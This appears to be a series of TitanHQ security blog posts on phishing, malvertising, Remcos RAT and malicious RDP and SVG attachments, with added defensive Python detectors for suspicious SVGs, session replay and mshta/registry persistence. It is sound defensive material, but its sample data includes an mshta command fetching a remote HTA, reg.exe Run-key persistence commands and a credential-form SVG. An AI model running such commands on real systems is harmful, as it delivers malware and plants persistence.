SVG files, or Scalable Vector Graphics files to give them their full name, differ from standard image files such as BMP, JPG, and PNG files. Vector graphics are constructed using mathematical formulas that establish points on a grid, rather than specific blocks of color (pixels). The advantage of vector graphics files is that they can be scaled infinitely with no loss of resolution, something that cannot be done with pixel-based images. Vector files are often used for logos, as they can be scaled up easily to be used in billboards with no loss of resolution, and they are increasingly being used on the web as the images will display correctly regardless of the size of the browser window or screen.
SVG is an incredibly versatile file format that can incorporate elements other than the image code. For instance, SVG files can be used to display HTML. It is possible to create an SVG image file that incorporates HTML and executes JavaScript on loading, redirecting users to a malicious website such as a phishing landing page. Images can be created that incorporate clickable download buttons, which will download payloads from a remote URL. An end user could easily be tricked into downloading a file with a double extension that appears to be a PDF file but is actually a malware executable.
Some of the recently intercepted phishing emails have included an SVG file that displays an image of an Excel spreadsheet. Since the spreadsheet is an image, the user cannot interact with it, but it includes an embedded form that mimics the Microsoft 365 login prompt. If the user enters their credentials into that form, they are transmitted to the threat actor. One of the problems with this type of file format is that it is not generally blocked by anti-spam software, so it is likely to be delivered to inboxes.
While SVG and other vector graphics file formats are invaluable for design and can be found extensively on the web, they are not generally used for image sharing, so the easiest way to protect against these malicious campaigns is to configure your spam filtering service to block or quarantine emails containing SVG file attachments, at least for employees who do not usually work with these file formats. If you have a cloud-based anti-spam service that incorporates email sandboxing, where attachments are sent for deep analysis, it is possible to detect SVG files that incorporate malicious JavaScript. Since the use of these file formats is increasing, it is important to make your employees aware of the threat through security awareness training. Emails with SVG file attachments should also be incorporated into your phishing simulations to determine whether employees open these files. Both are easy with the SafeTitan security awareness training and phishing simulation platform.
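The kind of attachment inspection described above can be approximated with a static check. The following is an added example, not TitanHQ's or SpamTitan's code: it walks an email's attachments and reports SVG files that carry active content such as scripts, event handlers, or embedded HTML forms. The sample SVGs, addresses, and function names are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET
from email import message_from_bytes, policy
from email.message import EmailMessage

# URI schemes that execute or render markup when followed.
SCRIPT_URI = re.compile(r"\s*(?:javascript|vbscript):|\s*data:text/html", re.I)
# HTML elements that have no place in a static image.
HTML_ACTIVE = {"form", "input", "iframe", "object", "embed", "meta"}

# Constructed samples: a plain logo, and an image that wraps a login-style form.
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              b'<circle cx="5" cy="5" r="4"/></svg>')
SUSPICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="void(0)">
  <image href="sheet.png" width="600" height="400"/>
  <foreignObject width="300" height="200">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://login.example.invalid/">
      <input type="password" name="p"/>
    </form>
  </foreignObject>
</svg>"""


def local(name: str) -> str:
    """Strip an '{namespace}' prefix and lower-case the name."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list[str]:
    """Return active-content findings for one SVG; an empty list means static image."""
    if b"<!ENTITY" in data.upper():
        # Do not expand sender-defined entities; treat the file as suspicious.
        return ["inline entity declaration (not parsed)"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["malformed XML (not parsed)"]  # fail closed
    findings = set()
    for el in root.iter():
        name = local(el.tag)
        if name == "script":
            findings.add("script element")
        elif name == "foreignobject":
            findings.add("foreignObject (embedded HTML)")
        elif name in HTML_ACTIVE:
            findings.add(f"HTML <{name}> element")
        for attr, value in el.attrib.items():
            attr = local(attr)
            if attr.startswith("on"):
                findings.add(f"event handler attribute {attr}")
            elif attr in ("href", "action", "src") and SCRIPT_URI.match(value):
                findings.add(f"script URI in {attr}")
    return sorted(findings)


def scan_message(raw: bytes) -> dict[str, list[str]]:
    """Map each SVG attachment's filename to its findings."""
    msg = message_from_bytes(raw, policy=policy.default)
    results = {}
    # walk() also descends into attached messages (message/rfc822).
    for part in msg.walk():
        filename = part.get_filename() or ""
        is_svg = (part.get_content_type() == "image/svg+xml"
                  or filename.lower().endswith(".svg"))
        if is_svg:
            payload = part.get_payload(decode=True) or b""
            results[filename or "(unnamed)"] = scan_svg(payload)
    return results


def build_sample(svg: bytes, filename: str) -> bytes:
    """Build a constructed test message with one SVG attachment."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Constructed sample"
    msg.set_content("See attached.")
    msg.add_attachment(svg, maintype="image", subtype="svg+xml", filename=filename)
    return msg.as_bytes()


if __name__ == "__main__":
    for name, svg in (("logo.svg", BENIGN_SVG), ("statement.svg", SUSPICIOUS_SVG)):
        for fname, findings in scan_message(build_sample(svg, name)).items():
            verdict = "quarantine" if findings else "deliver"
            print(f"{fname}: {verdict} {findings}")
```

A static check like this only sees what is in the file itself, so it complements sandbox analysis and a block/quarantine policy rather than replacing them.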
by titanadmin | Nov 28, 2024 | Phishing & Email Spam |
A large-scale phishing campaign has been identified that abuses the e-signature software DocuSign, a hugely popular software solution used to legally and securely sign digital documents and eliminate the time-consuming process of manually signing documents.
DocuSign uses “envelopes” to send documents to individuals for signing. These document containers may contain one or more documents that need to be signed, and the envelopes are sent via email. In this campaign, a bad actor abuses the DocuSign Envelopes API to create fake invoices, which are mass-distributed via email. This campaign aims to get the recipient of the invoice to sign it using DocuSign, then the signed document can be used for the next phase of the scam, which typically involves sending the signed document to the billing department for payment, which may or may not be through DocuSign. The invoices generated for this campaign are based on legitimate DocuSign templates and are generated through a legitimate DocuSign account. The invoices include legitimate branding for DocuSign and the company/product the threat actor is impersonating – such as Norton Internet Security, PayPal, and other big-name brands.
The problem for businesses with this campaign is the emails are sent from the genuine docusign[.]net domain, which means email security solutions are unlikely to block the messages since the domain is trusted. Since the emails appear to be legitimate invoices with genuine branding and the correct invoice amount for the product being spoofed, end users are likely to be tricked by the emails. The tactics used in this campaign are similar to others that have abused legitimate cloud-based services to bypass email security solutions, such as sending malicious URLs in documents hosted on Google Docs and Microsoft SharePoint.
The primary defense against these campaigns is security awareness training. Businesses need to make their employees aware of campaigns such as these messages, which often bypass email security solutions and are likely to land in inboxes since they may not contain any malicious URLs or malware code and are sent from a legitimate, trusted domain. The workforce needs to be trained on cybersecurity best practices and told about the red flags in emails that are indicative of a scam. Training needs to be provided continuously to make employees aware of the latest scams, as bad actors are constantly refining their tactics, techniques, and procedures, and developing new ways to trick end users. The easiest way to do this is with a comprehensive security awareness training solution such as SafeTitan.
SafeTitan makes it easy to create training programs for different roles in the organization and automate these training programs to ensure training content is delivered in manageable chunks, with new content added and rolled out in response to the latest threats. These training programs should be augmented with phishing simulations. An email security solution with AI and machine-learning capabilities is also important, as standard spam software is not effective at identifying threats from legitimate and trusted cloud services. TitanHQ’s PhishTitan solution for Microsoft 365 has these capabilities and identifies the phishing emails that Microsoft often misses. PhishTitan scans inbound messages for malicious content, uses email sandboxing for detecting zero-day threats, adds banners to emails from external sources, and allows security teams to rapidly remediate identified threats throughout the entire email environment. In November 2024, Virus Bulletin assessed the engine that powers the SpamTitan spam filtering service and PhishTitan anti-phishing solution using around 125,000 emails. SpamTitan and PhishTitan blocked 100% of malware and 100% of phishing emails and only miscategorized 2 benign spam emails, demonstrating how effective these solutions are at blocking malicious emails.
For more information on improving your defenses against malicious email campaigns through cutting-edge email security and security awareness training, give the TitanHQ team a call today.
by titanadmin | Nov 26, 2024 | Phishing & Email Spam, Spam Software |
It is all too easy to place too much reliance on multifactor authentication (MFA) to protect against phishing attacks. In theory, if an employee is duped by a phishing email and their credentials are stolen, MFA should stop the threat actor from using those credentials to access the account, as they will not have the necessary additional authentication factor(s). The reality is somewhat different. While MFA can – and does – block many attacks where credentials have been obtained, it is far from infallible. MFA has made it much harder to compromise accounts but, in response, threat actors have developed new tactics to bypass MFA protections.
For example, there is a scam where an employee is contacted by an individual who claims to be from their IT department. The scammer tells them there is an issue with their account and they need to update their password. They are directed to a site where they are prompted to enter their password and enter the MFA code sent to their phone. The threat actor uses that information in real-time to access their account. Multiple campaigns have targeted IT helpdesk staff, with the threat actor impersonating an employee. They provide information to verify their identity (obtained in an earlier phase of the campaign) and ask to register a new device to receive their MFA codes.
Phishing-as-a-service (PhaaS) toolkits capable of defeating MFA, which can be purchased or rented, are advertised on hacking forums and Telegram channels. They involve an adversary-in-the-middle (AitM) attack and use a reverse proxy between the victim and the legitimate portal for the credentials being sought. The user is directed to a login page that appears exactly as expected, as the user is logging into the genuine site. What the user does not know is that the attacker sits between them and the site and captures credentials and the session cookie after MFA is successfully navigated. The attacker then has access to the account for the duration of the session cookie and can register a new device to receive future codes.
PhaaS kits are a serious threat and are proving popular with cybercriminals. Take the Rockstar 2FA kit for example, which is advertised for $200 for a 2-week subscription. The kit includes everything a phisher needs, including MFA bypass, login pages for targeting specific credentials, session cookie harvesting, undetectable malicious (FUD) links and link redirectors, a host of phishing templates, and an easy-to-use admin panel that allows tracking of phishing campaigns. The phishing URLs available are also hosted on legitimate services such as Google Docs Viewer, Microsoft OneDrive, and LiveAgent – sites commonly trusted by email security solutions. This is just one phishing kit. There are many being offered with similar capabilities.
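A detection for the session cookie theft described above, as an added example that is not from the original post or any TitanHQ product: it flags a session that, after MFA succeeds, is used from a second client, and escalates when that client registers a new MFA method. The event records, field names, and action names are constructed assumptions, not a vendor log schema.

```python
from datetime import datetime

# Constructed audit events. Field names are assumptions, not a vendor schema.
EVENTS = [
    # alice: MFA completes from one client, then the same session appears elsewhere.
    {"ts": "2024-11-26T09:00:05", "user": "alice", "session": "s-100",
     "ip": "203.0.113.50", "ua": "Chrome/131 Windows", "action": "mfa_success"},
    {"ts": "2024-11-26T09:00:40", "user": "alice", "session": "s-100",
     "ip": "203.0.113.50", "ua": "Chrome/131 Windows", "action": "mail_read"},
    {"ts": "2024-11-26T09:02:10", "user": "alice", "session": "s-100",
     "ip": "198.51.100.23", "ua": "Firefox/132 Linux", "action": "mail_read"},
    {"ts": "2024-11-26T09:03:30", "user": "alice", "session": "s-100",
     "ip": "198.51.100.23", "ua": "Firefox/132 Linux", "action": "mfa_method_added"},
    # bob: adds an MFA method from the client that authenticated. Not flagged.
    {"ts": "2024-11-26T10:15:00", "user": "bob", "session": "s-200",
     "ip": "192.0.2.14", "ua": "Edge/131 Windows", "action": "mfa_success"},
    {"ts": "2024-11-26T10:20:00", "user": "bob", "session": "s-200",
     "ip": "192.0.2.14", "ua": "Edge/131 Windows", "action": "mfa_method_added"},
]

# Actions that let whoever holds the session keep access after it expires.
SENSITIVE_ACTIONS = {"mfa_method_added"}


def find_session_replay(events):
    """Return {session_id: alert} for sessions used by more than one client.

    The client that completed MFA is the session's origin. Any later event on
    the same session from a different (ip, user agent) pair raises a medium
    alert; a sensitive action from that other client raises it to high.
    """
    origin = {}   # session id -> (ip, ua) that completed MFA
    alerts = {}
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["ts"])):
        sid = ev["session"]
        client = (ev["ip"], ev["ua"])
        if ev["action"] == "mfa_success":
            origin.setdefault(sid, client)
            continue
        # Skip sessions whose start is outside the window, and same-client activity.
        if sid not in origin or client == origin[sid]:
            continue
        alert = alerts.setdefault(sid, {
            "user": ev["user"],
            "origin": origin[sid],
            "other_clients": set(),
            "severity": "medium",
            "sensitive": [],
        })
        alert["other_clients"].add(client)
        if ev["action"] in SENSITIVE_ACTIONS:
            alert["severity"] = "high"
            alert["sensitive"].append((ev["ts"], ev["action"]))
    return alerts


if __name__ == "__main__":
    for sid, alert in find_session_replay(EVENTS).items():
        print(sid, alert["user"], alert["severity"], sorted(alert["other_clients"]))
```

Roaming users also change address mid-session, so medium alerts need tuning against a baseline; the high-severity case pairs the client change with the new-device registration the post describes.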
The take-home message is that MFA, while important, can be bypassed. For maximum protection, phishing-resistant multifactor authentication should be used – e.g. smartcards or FIDO security keys. These MFA tools can be expensive to implement, so at the very least ensure that you have some form of MFA implemented and implement several other layers of defenses. An advanced spam filtering service such as SpamTitan is essential, as it can block phishing emails to ensure they do not reach end users. Review sites often rate SpamTitan as one of the best spam filters for business due to how easy the solution is to use and its excellent detection rate. In November 2024, in tests by Virus Bulletin, SpamTitan blocked 100% of malware and 100% of phishing emails out of a test involving around 125,000 messages. Previous assessments had a catch rate of more than 99.99%, demonstrating the reliability and accuracy of the solution.
Another layer of protection can be provided by a web filter, which will block attempts to visit known malicious websites, such as those used for phishing and malware distribution. WebTitan provides time-of-click protection, as does TitanHQ’s PhishTitan product – an anti-phishing solution specifically developed to protect M365 accounts against phishing by augmenting Microsoft’s controls to catch the phishing emails that EOP and Defender miss.
Technical defenses are important, but so too is workforce training. Through regular security awareness training and phishing simulations, employees can be taught cybersecurity best practices and how to identify and avoid scam emails. If you want to improve your defenses against phishing and malware, give the TitanHQ team a call and have a chat about your options. All TitanHQ solutions are easy to use, are available on a free trial, and full product support is provided during that trial.
by titanadmin | Nov 25, 2024 | Internet Security |
Most cyberattacks start with phishing, so businesses need to ensure they have an advanced spam filter service capable of accurately identifying and remediating phishing attempts, with robust anti-malware capabilities such as email sandboxing to combat the growing volume of zero-day malware threats. While security teams are all too aware of the threat of phishing, another attack vector is on the rise – malvertising.
Malvertising, or malicious advertising, is the use of deceptive adverts that direct users to malicious web pages. These malicious pages are used to steal sensitive information, infect visitors with malware, and direct users to a wide range of scams. Malvertising can appear on legitimate websites that have been compromised by threat actors and through third-party ad blocks that many legitimate website owners use to boost revenue. They are also commonly encountered on search engines and may appear in prominent positions, placed above the organic listings for key search terms.
Advertisers, including Google, have checks in place and vet advertisers to ensure malicious adverts do not make it onto their networks, but despite robust controls, many malicious adverts are displayed in the search engine results and are pushed out to hundreds of legitimate websites. These adverts may only be short-lived but they are active for long enough to get huge numbers of views and many clicks. Given the increase in malvertising, this method of contact with end users is proving profitable for cybercriminals.
Recent Examples of Malvertising Campaigns
At the start of the month, a new malvertising campaign was detected that used Meta business accounts and personal Facebook accounts to abuse the Meta advertising platform to display malicious ads. Many different ads were used for the campaign, with the common theme being adverts for well-known software tools including CapCut, Office 365, Canva, video streaming services such as Netflix, video games, and many more. The adverts appeared to primarily target middle-aged men.
The threat actor behind the campaign used almost 100 malicious domains according to the Bitdefender analysis, served several thousand ads, and undoubtedly reached tens of thousands of users. The aim of the campaign was to distribute an information stealer called SYS01stealer. SYS01stealer is used to steal login credentials and other sensitive data, including browser histories, cookies and Facebook ad and business account data. The Facebook data was used to compromise Facebook accounts which are used to create further malicious adverts to scale up the operation.
Another Facebook malvertising campaign targeted Facebook users in Europe. In this case, the threat actor used fraudulent ads for the Bitwarden password manager. The ads claimed to offer security updates and showed alerts about compromised passwords. Clicking the ad directs the user to a web page spoofing the Chrome web store, which delivers a browser extension. If granted permissions, the extension could alter network requests and access sites, cookies, and storage. The installation also launches JavaScript which exfiltrates task data, cookies, and Facebook details for personal and business accounts.
A campaign identified by Malwarebytes in November targeted eBay users. The malicious adverts were served via Google Ads and the campaign involved at least four different advertiser accounts. In this campaign, the aim was to trick people into calling an eBay support number which was a tech support scam.
Because the adverts often appear on trusted websites, including websites that are frequently visited, they fool a great many people who mistakenly trust that the adverts are genuine.
How Should Businesses Deal with the Malvertising Threat?
The primary defense for consumers is vigilance. The fact that an advert appears on a trusted website or search engine does not mean that the advert is genuine. As is the case with carefully checking links in emails and the domains to which those links direct, the domain and URL should be carefully checked to make sure they belong to a legitimate vendor.
Businesses can easily protect against malvertising by using a web filter such as WebTitan. WebTitan is a DNS filter that blocks access to all known malicious websites and receives consistent threat intelligence to protect against zero-minute threats. WebTitan can be configured to block downloads of certain file types from the Internet, such as executable files to block malware delivery and prevent the installation of unauthorized software products, which often sideload unwanted programs. WebTitan can also be used to prevent employees – on or off the network – from visiting any of 53 categories of websites, with a further 8 customizable categories giving granular control over the content that users can access.
Businesses should also raise awareness of the threat of malvertising through security awareness training. The SafeTitan security awareness training platform includes training modules on malvertising and hundreds of training modules covering other threats to improve human defenses against phishing, malware, and scams.
WebTitan is available on a free trial, with full support provided throughout the trial. For more information on WebTitan and to book a product demonstration, give the TitanHQ team a call today.
by titanadmin | Nov 25, 2024 | Email Scams, Phishing & Email Spam |
As consumers wait patiently for Black Friday to snaffle a bargain or two, scammers are hard at work perfecting their Black Friday scams and getting ahead of the game by offering amazing deals via email. In the run-up to Black Friday, Cyber Monday, and throughout the holiday season, everyone should be wary of scams and spam emails. The superb offers and hugely discounted prices are not always what they seem. Most are scams.
There are Black Friday and Cyber Monday deals aplenty, with bricks and mortar and online retailers vying to get your business to kick start the holiday season shopping bonanza. Rather than being confined to the weekend, many retailers have offers over an extended period, and marketing for those deals starts well in advance. Black Friday deals seem to be taking over much of November. While there are bargains to be had, even the incredible prices being offered by genuine retailers may not be quite as good as they seem. While Black Friday deals are touted as being the lowest prices of the year, research suggests that is not necessarily the case. According to the consumer group Which? it is common for prices to be inflated in the run-up to Black Friday to make the discounts seem bigger, and in some cases, the price that a retailer claims a product has been reduced from has never been offered in the previous 12 months. It pays to do some research before you buy.
As far as online shopping goes, it is important to visit your favorite retailers’ websites directly and, as a general rule of thumb, never respond to any offers received by email by clicking links. If you get an email from a retailer advising you of a Black Friday deal, visit their website using your bookmark or by typing in the URL. If the offer is available it should be detailed on the website. This is important as the majority of Black Friday emails are scams. According to a recent analysis by Bitdefender – the company that powers the SpamTitan email sandbox – 77% of Black Friday-themed spam were scams, a 7% increase from 2023. Many of these scam emails impersonate big-name brands and offer impressive but fake discounts on products and services. They often lead to financial loss, data theft, and malware infections.
Black Friday scams include offering top-name brands at heavily discounted prices, but actually mailing cheap counterfeit goods or not mailing any product at all. Big-name brands have been impersonated in spam emails that include an attachment purporting to be a shipping confirmation. The emails claim that orders are ready for shipment, when in fact the attachments direct users to websites where they are asked to disclose their credentials, or the attachments install malware.
At this time of year there is a surge in survey scams, where consumers are asked to take part in surveys in exchange for a discount or voucher, and after completing the survey are asked to disclose sensitive information that can be used directly for fraud or spear phishing campaigns. If you receive unwanted marketing communications from genuine retailers, you can use the unsubscribe option to update your preferences, but make sure you carefully check the destination of the unsubscribe button and the sender’s email address to confirm the communication is from a legitimate retailer.
If you receive spam emails, the unsubscribe option should be avoided. Using the unsubscribe option lets the scammer know that the account is active, and all that is likely to happen is you will receive even more spam. Far better is to mark the email as spam and block the sender. Clicking an unsubscribe option in an email may direct you to a site where a vulnerability is exploited to download malware.
Businesses should ensure they have an effective spam filter, and it is never more important than in November, December, and January when spammers are highly active. At TitanHQ, we offer products that provide exceptional protection against spam, scams, phishing emails, and malware. In recent independent tests by VirusBulletin, the engine that powers the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 achieved a 100% phishing catch rate, a 100% malware catch rate, and a spam catch rate in excess of 99.9% in November 2024 results. These follow overall scores in excess of 99.99% for blocking spam, phishing, and malware earlier in the year, demonstrating these email security products provide excellent and reliable protection against malicious and spam emails.
by titanadmin | Nov 22, 2024 | Industry News, Phishing & Email Spam |
TitanHQ is thrilled to announce that the engine that powers its email security solutions – SpamTitan and PhishTitan – achieved an incredible 100% catch rate for phishing emails and malware in November 2024 in independent tests by Virus Bulletin.
Virus Bulletin is a testing and certification body that has an excellent reputation within the information security community. Virus Bulletin performs independent tests of security solutions and has been reviewing, benchmarking, and issuing certifications for security products for more than 2 decades.
The spam, malware, and phishing identification tests are conducted over a 16-day period each month, with the final results published each quarter. For the past two quarters, TitanHQ’s email security solutions have achieved VBSpam+ certification, and the results from October and November indicate SpamTitan email security and the PhishTitan anti-phishing solutions are on track to receive their third consecutive quarterly VBSpam+ certification.
The interim results for November are based on an evaluation of almost 125,000 emails. TitanHQ’s solutions correctly identified all malware and phishing emails over that period, and it was nearly a clean sweep of 100% scores; however, there was a narrow miss on blocking non-malicious spam emails, as while the vast majority of spam emails were correctly identified, 2 spam emails were unfortunately miscategorized.
The flawless results for malware blocking and phishing identification by TitanHQ’s cloud-based anti-spam software clearly demonstrate the superb reliability and effectiveness of TitanHQ’s email security solutions and validate what our customers already know – that you can rely on TitanHQ to keep your email accounts free from threats.
“We are thrilled to have significantly outperformed our main competitors and surpassed the industry average,” said Ronan Kavanagh, CEO at TitanHQ. “Our unwavering commitment to providing unmatched email security is evident in these results, and we remain dedicated to protecting our clients from evolving cyber threats.”
In addition to providing a cutting-edge, easy to use, email filtering service, TitanHQ’s cybersecurity portfolio also includes a comprehensive security awareness training and phishing simulation platform – SafeTitan; a DNS-based web filtering solution for blocking Internet threats and controlling internet access – WebTitan; an easy-to-use and cost-effective email archiving solution – ArcTitan; and an email encryption solution for securing sensitive data – EncryptTitan.
All TitanHQ solutions are cloud-based and easy to implement and use, even by individuals with little technical expertise. These solutions can be used by businesses of all sizes and TitanHQ also offers anti-spam solutions for managed service providers to allow them to provide comprehensive security services to their clients.
For more information about these solutions or joining our partner program, give the TitanHQ team a call today and be sure to check out these anti-spam tips.
by titanadmin | Nov 15, 2024 | Phishing & Email Spam |
A phishing campaign has been identified that uses purchase order-related lures and Excel file attachments to deliver the Remcos RAT, a commercially available malware variant that gives threat actors remote access to an infected device. The malware allows the threat actor to log keystrokes, record audio via the microphone, and take screenshots and provides a foothold allowing an extensive compromise. Infection with the Remcos RAT invariably involves data theft and could lead to a ransomware attack and extortion.
Businesses with antivirus software installed are unlikely to be protected. While antivirus software is effective at detecting and neutralizing malware, the Remcos RAT is poorly detected as it is fileless malware that runs in memory and does not install files on the disk. The campaign, detected by researchers at FortiGuard Labs, targets Windows users and starts with a phishing email with an encrypted Excel attachment. The emails purport to be a purchase order and include a malicious Excel file attachment. The Excel file uses OLE objects to exploit an old vulnerability in Office, tracked as CVE-2017-0199. Successful exploitation of the vulnerability will see an HTML Application (HTA) file downloaded, which is launched using mshta.exe. The file is heavily obfuscated to evade security solutions, and its function is to download and execute a binary, which uses process hollowing to download and run the Remcos RAT in memory.
The Remcos RAT is used to enumerate and terminate processes, execute commands, capture sensitive data, and download additional malware payloads. Since the Remcos RAT runs in memory, it will not survive a reboot. To achieve persistence, it runs the registry editor (reg.exe) to edit the Windows Registry to add a new auto-run item to ensure it is launched after each reboot.
Since the initial contact is made via email, an advanced email security solution with email sandboxing and AI- and machine learning capabilities should ensure the email is identified as malicious and blocked to prevent delivery. Should the email be delivered and the attachment opened, end users are informed that the document is protected. They are presented with a blurred version of the Excel file and are told they need to enable editing to view the content – a red flag that should be identified by security-aware employees. If that red flag is missed, enabling content will trigger the exploitation of the vulnerability that ultimately delivers the Remcos RAT. Businesses with an advanced DNS-based web filter will have another layer of protection, as the URLs hosting the malicious files should be blocked.
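The two process-level behaviors described above (an HTA launched through mshta.exe, then reg.exe adding an auto-run item) can be hunted in process-creation telemetry. The following Python sketch is an added example, not code from the original article or from FortiGuard Labs; the event fields, rule names, host names, and log lines are constructed assumptions modeled on typical process-creation logging.

```python
import re
from datetime import datetime, timedelta

# Assumption: Office applications that should never be the parent of mshta.exe.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\b", re.IGNORECASE)
REMOTE_OR_HTA = re.compile(r"https?://|\.hta\b", re.IGNORECASE)


def exe_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a rule name for one process-creation event, or None."""
    image = exe_name(event["image"])
    parent = exe_name(event["parent"])
    cmd = event["cmdline"]
    # mshta.exe started by Office, or given a URL / .hta file to run.
    if image == "mshta.exe" and (parent in OFFICE_PARENTS or REMOTE_OR_HTA.search(cmd)):
        return "mshta_hta_launch"
    # reg.exe writing (not querying) a Run or RunOnce auto-start key.
    if image == "reg.exe" and re.search(r"\badd\b", cmd, re.IGNORECASE) and RUN_KEY.search(cmd):
        return "reg_autorun_add"
    return None


def correlate(events, window=timedelta(minutes=30)):
    """Alert on each match; escalate an auto-run change that follows an
    mshta launch on the same host within the time window."""
    alerts, last_mshta = [], {}
    for ev in sorted(events, key=lambda e: e["time"]):
        rule = classify(ev)
        if rule is None:
            continue
        severity = "medium"
        if rule == "mshta_hta_launch":
            last_mshta[ev["host"]] = ev["time"]
        elif ev["host"] in last_mshta and ev["time"] - last_mshta[ev["host"]] <= window:
            severity = "high"
        alerts.append({"host": ev["host"], "time": ev["time"],
                       "rule": rule, "severity": severity})
    return alerts


def _t(hhmm):
    return datetime(2024, 11, 15, int(hhmm[:2]), int(hhmm[3:]))


EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
REG = r"C:\Windows\System32\reg.exe"

# Constructed sample events (not taken from a real incident).
EVENTS = [
    {"host": "WS-014", "time": _t("09:02"), "parent": r"C:\Windows\explorer.exe",
     "image": EXCEL, "cmdline": r'EXCEL.EXE "C:\Users\a\Downloads\PO.xls"'},
    {"host": "WS-014", "time": _t("09:03"), "parent": EXCEL,
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://files.example.invalid/view.hta"},
    {"host": "WS-014", "time": _t("09:05"), "parent": r"C:\Windows\System32\cmd.exe",
     "image": REG,
     "cmdline": r'reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" '
                r'/v Example /d "C:\Users\a\AppData\Roaming\example.exe" /f'},
    {"host": "WS-022", "time": _t("10:40"), "parent": r"C:\Program Files\Vendor\setup.exe",
     "image": REG,
     "cmdline": r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run '
                r'/v VendorTray /d "C:\Program Files\Vendor\tray.exe"'},
    {"host": "WS-022", "time": _t("10:41"), "parent": r"C:\Windows\System32\cmd.exe",
     "image": REG,
     "cmdline": r"reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"},
]

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert["time"].time(), alert["host"], alert["rule"], alert["severity"])
```

An auto-run change on its own is common during software installs, which is why it only escalates to high when it follows an mshta launch on the same host.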
TitanHQ offers cutting-edge cybersecurity solutions that provide exceptional protection against phishing, BEC, and malware attacks, blocking the initial emails and connections to malicious websites to prevent end users from viewing malicious emails (SpamTitan) and preventing malicious file downloads from the Internet (WebTitan). In November 2024 tests by Virus Bulletin, TitanHQ’s SpamTitan Solution had a 100% phishing and malware block rate. TitanHQ also provides a comprehensive security awareness training platform (SafeTitan) to teach cybersecurity best practices and keep employees aware of the latest threats. The platform also incorporates a phishing simulator for reinforcing training. Give the TitanHQ team a call today for more information on TitanHQ solutions and how they can improve your defenses against email, web, SMS, and voice-based threats at your business.
by titanadmin | Oct 31, 2024 | Phishing & Email Spam |
The notorious Russian advanced persistent threat (APT) group Midnight Blizzard (aka Cozy Bear, APT29) has been conducting a massive spear phishing campaign on targets in the United Kingdom, Europe, Australia, and Japan. Midnight Blizzard is a hacking group with strong links to Russia’s Foreign Intelligence Service (SVR) which engages in espionage of foreign interests and seeks persistent access to accounts and devices to steal information of interest to the SVR. The latest campaign is a highly targeted information-gathering exercise that was first observed on October 22, 2024.
While Midnight Blizzard’s spear phishing attacks are usually conducted on government officials and individuals in non-governmental organizations (NGOs), individuals in academia and other sectors have also been targeted. The spear phishing attacks were identified by Microsoft Threat Intelligence which reports that thousands of emails have been sent to more than 100 organizations and the campaign is ongoing. While spear phishing is nothing new, Midnight Blizzard has adopted a new tactic in these attacks and is sending a signed Remote Desktop Protocol (RDP) configuration file as an email attachment, with a variety of lures tailored to the individual being targeted. Some of the intercepted emails impersonated Microsoft, others impersonated cloud service providers, and several of the emails used lures related to zero trust. The email addresses used in this campaign have been previously compromised in other Midnight Blizzard campaigns.
Amazon has also reported that it detected phishing emails that impersonated Amazon Web Services (AWS), attempting to trick the recipients into thinking AWS domains were used; however, the campaign did not seek AWS credentials, as Midnight Blizzard is targeting Windows credentials. Amazon immediately started the process of seizing the domains used by Midnight Blizzard to impersonate AWS and that process is ongoing.
RDP files contain automatic settings and resource mappings and are created when a successful connection to an RDP server occurs. The attached RDP files are signed with a Let’s Encrypt certificate and extend features and resources of the local system to a remote server under the attacker’s control. If the RDP file is executed, a connection is made to a server under the control of Midnight Blizzard, and the targeted user’s local device’s resources are bidirectionally mapped to the server.
The server is sent resources including logical hard disks, clipboard contents, printers, connected devices, authentication features, and Windows operating system facilities. The connection allows the attacker to install malware, which is set to execute via AutoStart folders, steal credentials, and download other tools to the user’s device, including remote access trojans to ensure that access to the targeted system is maintained when the RDP session is closed.
Since the emails were sent using email addresses at legitimate organizations, they are unlikely to be flagged as malicious based on reputation checks by anti-spam software, although they may be detected by more advanced anti-spam services that incorporate machine learning and AI-based detection mechanisms and email sandboxing. You should configure your spam and antivirus filters to block emails containing RDP files and other executable files and configure your firewall to block outbound RDP connection attempts to external or public networks. Multifactor authentication should be configured on all accounts to prevent compromised credentials from granting access, and you should consider using your endpoint security software to block executable files from running if the executable file is not on a trusted list. Also, ensure that downloaded files are scanned using antivirus software. A web filter can provide added protection against malicious file downloads from the internet.
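For triage of an .rdp attachment that has already been quarantined or reported, the settings that map local resources to the remote server can be read straight from the file. The following Python sketch is an added example, not code from the original article or from Microsoft; the setting names are standard .rdp properties, while the internal DNS suffix, verdict labels, and both sample files are constructed assumptions.

```python
import ipaddress

INTERNAL_SUFFIXES = (".corp.example",)  # assumption: your internal DNS suffixes

# .rdp properties that extend local resources to the remote host.
REDIRECT_FLAGS = {          # name:i:1 enables the redirection
    "redirectclipboard": "clipboard",
    "redirectprinters": "printers",
    "redirectcomports": "COM ports",
    "redirectsmartcards": "smart cards",
    "redirectposdevices": "point-of-service devices",
    "redirectwebauthn": "WebAuthn requests",
}
REDIRECT_LISTS = {          # name:s:<list or *> selects what is redirected
    "drivestoredirect": "local drives",
    "devicestoredirect": "plug-and-play devices",
    "usbdevicestoredirect": "USB devices",
}


def decode_rdp(raw):
    """.rdp files are commonly UTF-16 with a BOM; fall back to UTF-8."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
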